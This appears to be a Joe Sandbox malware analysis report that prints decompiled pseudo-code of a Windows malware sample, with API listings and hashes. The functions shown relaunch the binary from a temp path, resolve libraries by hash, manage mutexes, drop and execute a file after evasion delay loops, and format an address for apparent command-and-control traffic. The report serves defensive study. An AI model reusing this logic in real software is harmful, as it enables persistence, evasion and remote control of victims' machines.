Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Free$AllocateCloseCreateHandleNameView_snwprintf$ComputeComputerCrc32MappingModuleSizeUnmap_snprintflstrlen
String ID:
API String ID: 968319538-0
Opcode ID: d6664e7990cd9fb3ae879f0937cd375060898d44da70cee5c3c67cdb6c359184
Instruction ID: 587b58a5abfc5a0c7405d5b1ebd3beb50e124f1a2be89597de03b7422740d61e
Opcode Fuzzy Hash: d6664e7990cd9fb3ae879f0937cd375060898d44da70cee5c3c67cdb6c359184
Instruction Fuzzy Hash: D181C4F1658200BFEB207BA4AC8DFAE3B6CEB45B05F180016FA05EA3D1D7B499419771

Uniqueness

Uniqueness Score: -1.00%

Function 00989620, Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 284
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00989620(void* __ecx, void* __edx) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				long _v46;
				struct _PROCESS_INFORMATION _v52;
				WCHAR* _v56;
				intOrPtr _v60;
				void _v64;
				void* _v68;
				struct _STARTUPINFOW _v140;
				short _v660;
				int _t56;
				void* _t64;
				long _t71;
				void* _t74;
				signed int _t103;
				long _t115;
				void* _t119;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				intOrPtr* _t129;

				_t56 = lstrcmpiW(0x98c9c8, 0x98c7c0);
				if(_t56 != 0) {
					E009818D0();
					memset( &_v660, 0, 0x208);
					memset( &_v64, 0, 0x1e);
					_v60 = 1;
					_v56 = 0x98c9c8;
					_v52.hThread = 0xe14;
					_v52.hProcess = 0x98c7c0;
					_t64 =  *0x98c218( &_v64);
					if(_t64 != 0 || _v46 != _t64) {
						GetTempPathW(0x104,  &_v660);
						GetTempFileNameW( &_v660, 0, 0,  &_v660);
						_v56 = 0x98c7c0;
						_v52.hProcess =  &_v660;
						_v46 = 0;
						_t71 =  *0x98c218( &_v64);
						if(_t71 != 0 || _v46 != _t71) {
							goto L35;
						} else {
							_v46 = _t71;
							_v56 = 0x98c9c8;
							_v52.hProcess = 0x98c7c0;
							_t74 =  *0x98c218( &_v64);
							if(_t74 != 0 || _v46 != _t74) {
								goto L35;
							} else {
								goto L8;
							}
						}
					} else {
						L8:
						E00981970();
						if(( *0x98c2a4 & 0x00000001) == 0) {
							memset( &_v140, 0, 0x44);
							_v140.cb = 0x44;
							_v140.dwFlags = 0x80;
							if(CreateProcessW(0x98c7c0, 0, 0, 0, 0, 0, 0, 0,  &_v140,  &_v52) != 0) {
								CloseHandle(_v52);
								CloseHandle(_v52.hThread);
							}
							goto L35;
						} else {
							_t125 =  *0x98c040(0, 0, 6);
							_v28 = _t125;
							if(_t125 == 0) {
								L35:
								return 1;
							} else {
								_t127 =  *0x98c0c0(_t125, 0x98c3b0, 0x98c3b0, 0x12, 0x10, 2, 0, 0x98c7c0, 0, 0, 0, 0, 0);
								_v24 = _t127;
								if(_t127 != 0) {
									_push(0);
									_push(0);
									_v12 = 0;
									_push( &_v32);
									_push( &_v20);
									_push(0);
									_push(0);
									_push(3);
									_push(0x30);
									_push(0);
									_push(_t125);
									if( *0x98c054() == 0 && GetLastError() == 0xea) {
										_t119 = RtlAllocateHeap(GetProcessHeap(), 8, _v20);
										_v68 = _t119;
										if(_t119 != 0) {
											_push(0);
											_push(0);
											_push( &_v32);
											_push( &_v20);
											_push(_v20);
											_push(_t119);
											_push(3);
											_push(0x30);
											_push(0);
											_push(_t125);
											if( *0x98c054() == 0) {
												_t120 = _v16;
											} else {
												_t103 =  *0x98c3ac; // 0x0
												_t123 = _v32 * 0x2c + _t119;
												_v16 = _t123;
												_t120 = _v16;
												_t129 =  <  ? (_t103 & 0x0000000f) * 0x2c + _t119 : _t119;
												while(_t129 < _t123) {
													_t126 =  *0x98c088(_t125,  *_t129, 1);
													if(_t126 != 0) {
														_push( &_v8);
														_push(0);
														_push(0);
														_push(1);
														_push(_t126);
														if( *0x98c0b0() == 0 && GetLastError() == 0x7a) {
															_t120 = RtlAllocateHeap(GetProcessHeap(), 8, _v8);
															if(_t120 != 0) {
																_t115 =  *0x98c0b0(_t126, 1, _t120, _v8,  &_v8);
																_v12 = _t115;
																if(_t115 == 0) {
																	HeapFree(GetProcessHeap(), _t115, _t120);
																}
															}
														}
														 *0x98c0a8(_t126);
													}
													_t125 = _v28;
													_t129 = _t129 + 0x2c;
													_t123 = _v16;
													if(_v12 == 0) {
														continue;
													}
													break;
												}
												_t127 = _v24;
											}
											HeapFree(GetProcessHeap(), 0, _v68);
											if(_v12 != 0) {
												 *0x98c090(_t127, 1, _t120);
												HeapFree(GetProcessHeap(), 0, _t120);
											}
										}
									}
								} else {
									_t127 =  *0x98c088(_t125, 0x98c3b0, 0x10);
								}
								if(_t127 != 0) {
									 *0x98c048(_t127, 0, 0);
									 *0x98c0a8(_t127);
								}
								 *0x98c0a8(_t125);
								return 1;
							}
						}
					}
				} else {
					return _t56;
				}
			}

0x00989636
0x0098963e
0x00989647
0x0098965a
0x0098966b
0x00989674
0x00989680
0x00989687
0x0098968e
0x00989696
0x0098969e
0x009896b5
0x009896c7
0x009896d3
0x009896da
0x009896e1
0x009896e8
0x009896f0
0x00000000
0x009896ff
0x009896ff
0x00989706
0x0098970d
0x00989714
0x0098971c
0x00000000
0x00000000
0x00000000
0x00000000
0x0098971c
0x0098972b
0x0098972b
0x0098972b
0x00989737
0x00989940
0x00989949
0x00989956
0x00989980
0x00989985
0x0098998e
0x0098998e
0x00000000
0x0098973d
0x00989749
0x0098974b
0x00989750
0x00989996
0x0098999f
0x00989756
0x0098977e
0x00989780
0x00989785
0x0098979c
0x0098979e
0x009897a3
0x009897aa
0x009897ae
0x009897af
0x009897b1
0x009897b3
0x009897b5
0x009897b7
0x009897b9
0x009897c2
0x009897eb
0x009897ed
0x009897f2
0x009897f8
0x009897fa
0x009897ff
0x00989803
0x00989804
0x00989807
0x00989808
0x0098980a
0x0098980c
0x0098980e
0x00989817
0x00989930
0x0098981d
0x0098981d
0x0098982e
0x00989832
0x00989835
0x0098983a
0x00989840
0x00989853
0x00989857
0x0098985c
0x0098985d
0x0098985f
0x00989861
0x00989863
0x0098986c
0x0098988b
0x0098988f
0x0098989c
0x009898a2
0x009898a7
0x009898b2
0x009898b2
0x009898a7
0x0098988f
0x009898b9
0x009898b9
0x009898bf
0x009898c2
0x009898c9
0x009898cc
0x00000000
0x00000000
0x00000000
0x009898cc
0x009898d2
0x009898d2
0x009898e1
0x009898eb
0x009898f1
0x00989901
0x00989901
0x009898eb
0x009897f2
0x00989787
0x00989795
0x00989795
0x00989909
0x00989910
0x00989917
0x00989917
0x0098991e
0x0098992f
0x0098992f
0x00989750
0x00989737
0x00989646
0x00989646
0x00989646

APIs

lstrcmpiW.KERNEL32(0098C9C8,0098C7C0), ref: 00989636
memset.NTDLL ref: 0098965A
memset.NTDLL ref: 0098966B
GetTempPathW.KERNEL32(00000104,?), ref: 009896B5
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 009896C7

Strings

@Mxt, xrefs: 009897C8, 0098986E

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Tempmemset$FileNamePathlstrcmpi
String ID: @Mxt
API String ID: 2872760765-1922883433
Opcode ID: 99d743e526d5562d177dd41a346e2fde6004ee9a33b3c5772d34361cf1144ae0
Instruction ID: e76ee159d6207f3324a7e41fef0822c76310125c1cf91f1bc66a822d15191080
Opcode Fuzzy Hash: 99d743e526d5562d177dd41a346e2fde6004ee9a33b3c5772d34361cf1144ae0
Instruction Fuzzy Hash: 58A17EB1A54209BFEF20AFA4EC8DFAE777CAB04B05F140019F605F6390D7759944AB64

Uniqueness

Uniqueness Score: -1.00%

Function 00989C50, Relevance: 36.2, APIs: 24, Instructions: 185
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00989C50(void* __ecx) {
				void* _v8;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_push(__ecx);
				E00981830(0x98155c, 0xc, 0x4a604ebc,  &_v8);
				_t100 = _v8;
				E00981B10(LoadLibraryW(_t100), 0x981040, 0x21, 0x54b7e774, 0x98c040);
				HeapFree(GetProcessHeap(), 0, _t100);
				E00981830(0x981568, 0xc, 0x4a604ebc,  &_v8);
				_t101 = _v8;
				E00981B10(LoadLibraryW(_t101), 0x981024, 1, 0x3c505b91, 0x98c0c8);
				HeapFree(GetProcessHeap(), 0, _t101);
				E00981830(0x981574, 0xc, 0x4a604ebc,  &_v8);
				_t102 = _v8;
				E00981B10(LoadLibraryW(_t102), 0x981028, 2, 0x10577008, 0x98c214);
				HeapFree(GetProcessHeap(), 0, _t102);
				E00981830(0x981580, 0xc, 0x4a604ebc,  &_v8);
				_t103 = _v8;
				E00981B10(LoadLibraryW(_t103), 0x98100c, 1, 0x7194b56b, 0x98c0c4);
				HeapFree(GetProcessHeap(), 0, _t103);
				E00981830(0x981550, 0xc, 0x4a604ebc,  &_v8);
				_t104 = _v8;
				E00981B10(LoadLibraryW(_t104), 0x9810c4, 1, 0x20edec96, 0x98c0cc);
				HeapFree(GetProcessHeap(), 0, _t104);
				E00981830(0x981544, 0xc, 0x4a604ebc,  &_v8);
				_t105 = _v8;
				E00981B10(LoadLibraryW(_t105), 0x9810c8, 2, 0x620cb38e, 0x98c21c);
				HeapFree(GetProcessHeap(), 0, _t105);
				E00981830(0x981598, 0xc, 0x4a604ebc,  &_v8);
				_t106 = _v8;
				E00981B10(LoadLibraryW(_t106), 0x981220, 0xe, 0x5a7185ae, 0x98c230);
				HeapFree(GetProcessHeap(), 0, _t106);
				E00981830(0x98158c, 0xc, 0x4a604ebc,  &_v8);
				_t107 = _v8;
				E00981B10(LoadLibraryW(_t107), 0x981214, 3, 0x73ee0ad8, 0x98c224);
				HeapFree(GetProcessHeap(), 0, _t107);
				return E009892A0(_t61);
			}

0x00989c53
0x00989c68
0x00989c6d
0x00989c8d
0x00989c9f
0x00989cb8
0x00989cbd
0x00989cdd
0x00989cef
0x00989d08
0x00989d0d
0x00989d2d
0x00989d3f
0x00989d58
0x00989d5d
0x00989d7d
0x00989d8f
0x00989da8
0x00989dad
0x00989dcd
0x00989ddf
0x00989df8
0x00989dfd
0x00989e1d
0x00989e2f
0x00989e48
0x00989e4d
0x00989e6d
0x00989e7f
0x00989e98
0x00989ea0
0x00989ebd
0x00989ecf
0x00989ede

APIs

Part of subcall function 00981830: GetProcessHeap.KERNEL32(00000008,00989F6B,00000000,00000000,00981004,?,009815F4,4DBAC13F,00989F6B,?,00000000), ref: 00981844
Part of subcall function 00981830: RtlAllocateHeap.NTDLL(00000000,?,009815F4), ref: 0098184B

LoadLibraryW.KERNEL32(009816C0,?,009816C0), ref: 00989C74
GetProcessHeap.KERNEL32(00000000,009816C0,?,?,?,?,009816C0), ref: 00989C98
HeapFree.KERNEL32(00000000,?,?,?,?,009816C0), ref: 00989C9F
LoadLibraryW.KERNEL32(009816C0,?,?,?,?,?,?,009816C0), ref: 00989CC4
GetProcessHeap.KERNEL32(00000000,009816C0,?,?,?,?,?,?,?,?,?,009816C0), ref: 00989CE8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,009816C0), ref: 00989CEF
LoadLibraryW.KERNEL32(009816C0,?,?,?,?,?,?,?,?,?,?,?,009816C0), ref: 00989D14
GetProcessHeap.KERNEL32(00000000,009816C0), ref: 00989D38
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009816C0), ref: 00989D3F
LoadLibraryW.KERNEL32(009816C0), ref: 00989D64
GetProcessHeap.KERNEL32(00000000,009816C0), ref: 00989D88
HeapFree.KERNEL32(00000000), ref: 00989D8F
LoadLibraryW.KERNEL32(009816C0), ref: 00989DB4
GetProcessHeap.KERNEL32(00000000,009816C0), ref: 00989DD8
HeapFree.KERNEL32(00000000), ref: 00989DDF
LoadLibraryW.KERNEL32(009816C0), ref: 00989E04
GetProcessHeap.KERNEL32(00000000,009816C0), ref: 00989E28
HeapFree.KERNEL32(00000000), ref: 00989E2F
LoadLibraryW.KERNEL32(009816C0), ref: 00989E54
GetProcessHeap.KERNEL32(00000000,009816C0), ref: 00989E78
HeapFree.KERNEL32(00000000), ref: 00989E7F
LoadLibraryW.KERNEL32(009816C0), ref: 00989EA4
GetProcessHeap.KERNEL32(00000000,009816C0), ref: 00989EC8
HeapFree.KERNEL32(00000000), ref: 00989ECF

Part of subcall function 009892A0: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 009892B5

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeLibraryLoad$AllocateDirectoryWindows
String ID:
API String ID: 357832750-0
Opcode ID: 7292a7c94759f3185af5a14e28b405124b82080db80096c0cb57e8517c86dd0b
Instruction ID: 52ce728a539c5085bdc2521e20f24c4a6a607e1ecc0d534adfe2f015e865d670
Opcode Fuzzy Hash: 7292a7c94759f3185af5a14e28b405124b82080db80096c0cb57e8517c86dd0b
Instruction Fuzzy Hash: 9A51A3B1A58204BBEB1077E0AC5EF9F3B6CDB81346F100024F906A7787DA315E469BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00989060, Relevance: 34.7, APIs: 23, Instructions: 160
memorysynchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00989060(void* __eflags) {
				void* _v8;
				char _v12;
				short _v140;
				short _v268;
				short _v396;
				long _t31;
				void* _t45;
				void* _t47;
				long _t50;
				long _t57;
				int _t59;
				signed int _t60;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t59 = 0;
				memset(0x98c284, 0, 0x18);
				_t60 = 0x981364;
				_t2 = _t59 + 0xc; // 0xc
				E00981830(0x981364, _t2, 0x4a604ebc,  &_v8);
				_t67 = _v8;
				 *0x98c200( &_v140, 0x40, _t67,  *0x98c27c);
				HeapFree(GetProcessHeap(), 0, _t67);
				_t66 = CreateMutexW(0, 0,  &_v140);
				if(_t66 == 0) {
					L12:
					 *0x98c0b8( *0x98c288);
					 *0x98c064( *0x98c28c);
					 *0x98c064( *0x98c290);
					 *0x98c08c( *0x98c284, 0);
					E00988AA0();
					return E0098A750(_t60 | 0xffffffff);
				}
				_t31 = WaitForSingleObject(_t66, 0);
				if(_t31 == 0 || _t31 == 0x80) {
					E00981830(0x981258, 0xc, 0x4a604ebc,  &_v8);
					_t68 = _v8;
					 *0x98c200( &_v396, 0x40, _t68,  *0x98c27c);
					HeapFree(GetProcessHeap(), 0, _t68);
					_t60 = 0x981264;
					E00981830(0x981264, 0xc, 0x4a604ebc,  &_v8);
					_t69 = _v8;
					 *0x98c200( &_v268, 0x40, _t69,  *0x98c27c);
					HeapFree(GetProcessHeap(), 0, _t69);
					_t45 = CreateMutexW(0, 0,  &_v268);
					 *0x98c2a0 = _t45;
					if(_t45 == 0) {
						goto L12;
					}
					_t47 = CreateEventW(0, 0, 0,  &_v396);
					 *0x98c29c = _t47;
					if(_t47 != 0) {
						_t57 = SignalObjectAndWait(_t47,  *0x98c2a0, 0xffffffff, 0);
						if(_t57 == 0 || _t57 == 0x80) {
							_t59 = ResetEvent( *0x98c29c);
						}
					}
					ReleaseMutex(_t66);
					CloseHandle(_t66);
					if(_t59 != 0) {
						_t50 = GetTickCount();
						_push(0x10);
						_push(0x3e8);
						_push(0x3e8);
						_push(0);
						 *0x98c280 = 1;
						_push(E00988DD0);
						 *0x98c278 = _t50 + 0x3e8;
						_push(0);
						_push( &_v12);
						if( *0x98c0ec() != 0) {
							WaitForSingleObject( *0x98c29c, 0xffffffff);
							 *0x98c138(0, _v12, 0xffffffff);
						}
						CloseHandle( *0x98c29c);
					}
				}
			}

0x0098906e
0x00989076
0x0098907f
0x0098908a
0x0098908d
0x00989098
0x009890a5
0x009890b7
0x009890cc
0x009890d0
0x0098924f
0x00989255
0x00989261
0x0098926d
0x0098927b
0x00989281
0x00989294
0x00989294
0x009890d8
0x009890e0
0x00989100
0x0098910b
0x00989118
0x0098912b
0x0098913f
0x00989144
0x0098914f
0x0098915c
0x0098916f
0x00989180
0x00989186
0x0098918d
0x00000000
0x00000000
0x009891a0
0x009891a6
0x009891ad
0x009891ba
0x009891c2
0x009891d7
0x009891d7
0x009891c2
0x009891da
0x009891e1
0x009891e9
0x009891eb
0x009891f1
0x009891f3
0x009891f8
0x009891fd
0x00989204
0x0098920e
0x00989213
0x0098921b
0x0098921d
0x00989226
0x00989230
0x0098923d
0x0098923d
0x00989249
0x00989249
0x009891e9

APIs

memset.NTDLL ref: 00989076

Part of subcall function 00981830: GetProcessHeap.KERNEL32(00000008,00989F6B,00000000,00000000,00981004,?,009815F4,4DBAC13F,00989F6B,?,00000000), ref: 00981844
Part of subcall function 00981830: RtlAllocateHeap.NTDLL(00000000,?,009815F4), ref: 0098184B

_snwprintf.NTDLL ref: 009890A5
GetProcessHeap.KERNEL32(00000000,00989315), ref: 009890B0
HeapFree.KERNEL32(00000000), ref: 009890B7
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 009890C6
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 009890D8
_snwprintf.NTDLL ref: 00989118
GetProcessHeap.KERNEL32(00000000,00989315), ref: 00989124
HeapFree.KERNEL32(00000000), ref: 0098912B
_snwprintf.NTDLL ref: 0098915C
GetProcessHeap.KERNEL32(00000000,00989315), ref: 00989168
HeapFree.KERNEL32(00000000), ref: 0098916F
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00989180
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 009891A0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 009891BA
ResetEvent.KERNEL32 ref: 009891D1
ReleaseMutex.KERNEL32(00000000), ref: 009891DA
CloseHandle.KERNEL32(00000000), ref: 009891E1
GetTickCount.KERNEL32 ref: 009891EB
CreateTimerQueueTimer.KERNEL32(?,00000000,00988DD0,00000000,000003E8,000003E8,00000010), ref: 0098921E
WaitForSingleObject.KERNEL32(000000FF), ref: 00989230
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 0098923D
CloseHandle.KERNEL32 ref: 00989249

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessTimer$FreeMutexObjectWait_snwprintf$CloseEventHandleQueueSingle$AllocateCountDeleteReleaseResetSignalTickmemset
String ID:
API String ID: 3199319163-0
Opcode ID: 8bc5e095691c8f9a592ddef07fb8bdbb0781dcc92d3421e9c1f6ab78dbf01f15
Instruction ID: effadeb50d4be281fc75dfc447a6fe9d27cc7623294d8cdb476e14cec6377c9f
Opcode Fuzzy Hash: 8bc5e095691c8f9a592ddef07fb8bdbb0781dcc92d3421e9c1f6ab78dbf01f15
Instruction Fuzzy Hash: EA515CB152C205BFEB106BE0EC8DFAA3B6CEB44715F144125FA25E23E1DB709944AB70

Uniqueness

Uniqueness Score: -1.00%

Function 00989A90, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 139
memoryfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00989A90(void* __ecx, long __edx) {
				long _v8;
				void* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v100;
				char _v228;
				short _v748;
				signed int _t28;
				int _t46;
				void* _t52;
				void* _t59;
				void* _t60;
				short _t61;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_v8 = __edx;
				_t52 = __ecx;
				memset( &_v100, 0, 0x44);
				memset( &_v28, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 0x80;
				_t61 = 0;
				do {
					if(_t61 < 0xfa00) {
						GetLastError();
					}
					_t61 = _t61 + 1;
				} while (_t61 < 0x8000000);
				_t28 = GetTickCount();
				_t7 = (_t28 & 0x0000000f) + 4; // 0x4
				E00982240( &_v228, _t7);
				 *((short*)(_t68 + (_t28 & 0x0000000f) * 2 - 0xd8)) = 0;
				E00981830(0x981370, 0xc, 0x7d1cc189,  &_v12);
				_t64 = _v12;
				 *0x98c200( &_v748, 0x104, _t64, 0x98c5b8,  &_v228);
				HeapFree(GetProcessHeap(), 0, _t64);
				_t65 = 0;
				do {
					if(_t65 < 0xfa00) {
						GetLastError();
					}
					_t65 = _t65 + 1;
				} while (_t65 < 0x8000000);
				_t59 = CreateFileW( &_v748, 0x40000000, 0, 0, 2, 0x80, 0);
				_t66 = 0;
				do {
					if(_t66 < 0xfa00) {
						GetLastError();
					}
					_t66 = _t66 + 1;
				} while (_t66 < 0x8000000);
				if(_t59 != 0xffffffff) {
					WriteFile(_t59, _t52, _v8,  &_v8, 0);
					CloseHandle(_t59);
				}
				_t60 = 0;
				do {
					_t67 = 0;
					do {
						if(_t67 < 0xfa00) {
							GetLastError();
						}
						_t67 = _t67 + 1;
					} while (_t67 < 0x8000000);
					_t46 = CreateProcessW( &_v748, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
					if(_t46 != 0) {
						CloseHandle(_v28);
						return CloseHandle(_v28.hThread);
					} else {
						goto L20;
					}
					L23:
					L20:
					_t60 = _t60 + 1;
					Sleep(0xc8);
				} while (_t60 < 0x10);
				return _t46;
				goto L23;
			}

0x00989aa1
0x00989aa7
0x00989aa9
0x00989ab7
0x00989ac0
0x00989ac7
0x00989ace
0x00989ad0
0x00989ad6
0x00989ad8
0x00989ad8
0x00989ade
0x00989adf
0x00989ae7
0x00989af8
0x00989afb
0x00989b07
0x00989b1d
0x00989b22
0x00989b3e
0x00989b51
0x00989b57
0x00989b60
0x00989b66
0x00989b68
0x00989b68
0x00989b6e
0x00989b6f
0x00989b96
0x00989b98
0x00989ba0
0x00989ba6
0x00989ba8
0x00989ba8
0x00989bae
0x00989baf
0x00989bba
0x00989bc7
0x00989bce
0x00989bce
0x00989bd4
0x00989bd6
0x00989bd6
0x00989bd8
0x00989bde
0x00989be0
0x00989be0
0x00989be6
0x00989be7
0x00989c0c
0x00989c14
0x00989c31
0x00989c46
0x00000000
0x00000000
0x00000000
0x00000000
0x00989c16
0x00989c1b
0x00989c1c
0x00989c22
0x00989c2d
0x00000000

APIs

memset.NTDLL ref: 00989AA9
memset.NTDLL ref: 00989AB7
GetLastError.KERNEL32 ref: 00989AD8
GetTickCount.KERNEL32 ref: 00989AE7
_snwprintf.NTDLL ref: 00989B3E
GetProcessHeap.KERNEL32(00000000,?), ref: 00989B4A
HeapFree.KERNEL32(00000000), ref: 00989B51
GetLastError.KERNEL32 ref: 00989B68
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00989B90
GetLastError.KERNEL32 ref: 00989BA8
WriteFile.KERNEL32(00000000,?,00988F6C,00988F6C,00000000), ref: 00989BC7
CloseHandle.KERNEL32(00000000), ref: 00989BCE
GetLastError.KERNEL32 ref: 00989BE0
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00989C0C
Sleep.KERNEL32(000000C8), ref: 00989C1C

Strings

@Mxt, xrefs: 00989AD8, 00989B68, 00989BA8, 00989BE0

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateFileHeapProcessmemset$CloseCountFreeHandleSleepTickWrite_snwprintf
String ID: @Mxt
API String ID: 2430354324-1922883433
Opcode ID: 0ecd610e9f185a35e71d187f68509aec4a1f8d26fc684832b36b12a7de2a9c33
Instruction ID: ca4054ccd02ef8e972363d73ccff1b77cdd344a79410b7e9556237e462c130b1
Opcode Fuzzy Hash: 0ecd610e9f185a35e71d187f68509aec4a1f8d26fc684832b36b12a7de2a9c33
Instruction Fuzzy Hash: BE41E8B2958114ABEB10AB94EC8DFEDB77DEB44301F000161FA0AE76D1CB3059819BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00988520, Relevance: 22.7, APIs: 15, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00988520(void* _a4, long* _a8) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v32;
				void* _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v188;
				void* _t42;
				signed char* _t62;
				void* _t64;
				void _t79;
				long _t82;
				long* _t83;
				signed char* _t88;
				void* _t92;
				long* _t103;
				void* _t104;
				void* _t105;

				_v32 = 0x10;
				_t42 = E00988420( *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v24);
				_t103 = _a8;
				_v28 = _t42;
				_t83 =  &(_t103[1]);
				 *_t83 = 0;
				 *_t103 = 0;
				if(_t42 != 0) {
					if(E00988700( &_v40,  &_v32) != 0) {
						if(E009823F0( &_v40,  &_v12) != 0) {
							E00981830(0x98c020, 0xc, 0x58619fa4,  &_a4);
							_t88 =  *0x98c298; // 0x0
							_t104 = _a4;
							 *0x98c200( &_v188, 0x40, _t104, _t88[3] & 0x000000ff, _t88[2] & 0x000000ff, _t88[1] & 0x000000ff,  *_t88 & 0x000000ff);
							HeapFree(GetProcessHeap(), 0, _t104);
							_t62 =  *0x98c298; // 0x0
							_push(_t88);
							_t64 = E00981C50( &_v60,  &_v188, _t62[4] & 0x0000ffff);
							_t105 = _v12;
							if(_t64 != 0) {
								_push(_v8);
								_push(_t105);
								if(E00981D40( &_v60) != 0) {
									if(E00981E50( &_v60,  &_v12,  &_v8) != 0) {
										if(E00982530( &_v12,  &_v20) != 0) {
											_t92 = _v20;
											_t79 =  *_t92;
											 *_t83 = _t79;
											if(_t79 < 0x4000000) {
												_t82 = E009884C0(_t92 + 4, _v16 - 4, _t83);
												_t92 = _v20;
												 *_t103 = _t82;
											}
											HeapFree(GetProcessHeap(), 0, _t92);
										}
										HeapFree(GetProcessHeap(), 0, _v12);
									}
									 *0x98c234(_v52);
								}
								 *0x98c234(_v56);
								 *0x98c234(_v60);
							}
							HeapFree(GetProcessHeap(), 0, 0);
							HeapFree(GetProcessHeap(), 0, _t105);
						}
						HeapFree(GetProcessHeap(), 0, _v40);
					}
					HeapFree(GetProcessHeap(), 0, _v28);
				}
				return 0 |  *_t103 != 0x00000000;
			}

0x00988538
0x0098853f
0x00988544
0x0098854a
0x0098854d
0x00988550
0x00988556
0x0098855e
0x00988571
0x00988588
0x009885a1
0x009885a6
0x009885ac
0x009885cc
0x009885df
0x009885e5
0x009885f0
0x009885f9
0x009885fe
0x00988606
0x0098860c
0x00988612
0x00988620
0x00988636
0x00988649
0x0098864b
0x0098864e
0x00988650
0x00988657
0x00988663
0x00988668
0x0098866e
0x0098866e
0x0098867a
0x0098867a
0x0098868c
0x0098868c
0x00988695
0x00988695
0x0098869e
0x009886a7
0x009886a7
0x009886b8
0x009886c8
0x009886c8
0x009886da
0x009886da
0x009886ec
0x009886ec
0x009886ff

APIs

Part of subcall function 00988420: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00988468
Part of subcall function 00988420: RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0098846F
